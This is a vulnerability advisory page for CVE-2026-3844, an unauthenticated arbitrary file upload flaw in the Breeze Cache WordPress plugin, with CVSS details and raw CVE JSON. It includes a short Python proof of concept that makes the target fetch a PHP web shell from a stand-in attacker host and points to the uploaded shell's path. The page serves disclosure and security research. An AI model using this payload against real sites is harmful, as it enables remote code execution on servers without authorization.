Security Vulnerability Report
中文
CVE-2026-3844 CVSS 9.8 CRITICAL

CVE-2026-3844

Published: 2026-04-23 03:16:18
Last Modified: 2026-04-23 14:28:56
Source: [email protected]

Description

The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fetch_gravatar_from_remote' function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability can only be exploited if "Host Files Locally - Gravatars" is enabled, which is disabled by default.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Breeze Cache <= 2.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://example.com" malicious_file_url = "http://attacker-server.com/shell.php" # The vulnerable endpoint might be triggered via a specific action or cron simulation # This is a conceptual PoC demonstrating the payload submission payload_data = { "action": "breeze_update_gravatar", "user_email": "[email protected]", "gravatar_url": malicious_file_url } try: # Send request to trigger the vulnerable function response = requests.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload_data) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the target server for the uploaded file.") # Assuming the upload path is predictable, e.g., /wp-content/uploads/breeze-gravatar/ print(f"[+] Try accessing: {target_url}/wp-content/uploads/breeze-gravatar/shell.php") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3844", "sourceIdentifier": "[email protected]", "published": "2026-04-23T03:16:17.527", "lastModified": "2026-04-23T14:28:55.557", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fetch_gravatar_from_remote' function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability can only be exploited if \"Host Files Locally - Gravatars\" is enabled, which is disabled by default."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L119", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L89", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3511463/breeze", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e342b1c0-6e7f-4e2c-8a52-018df12c12a0?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.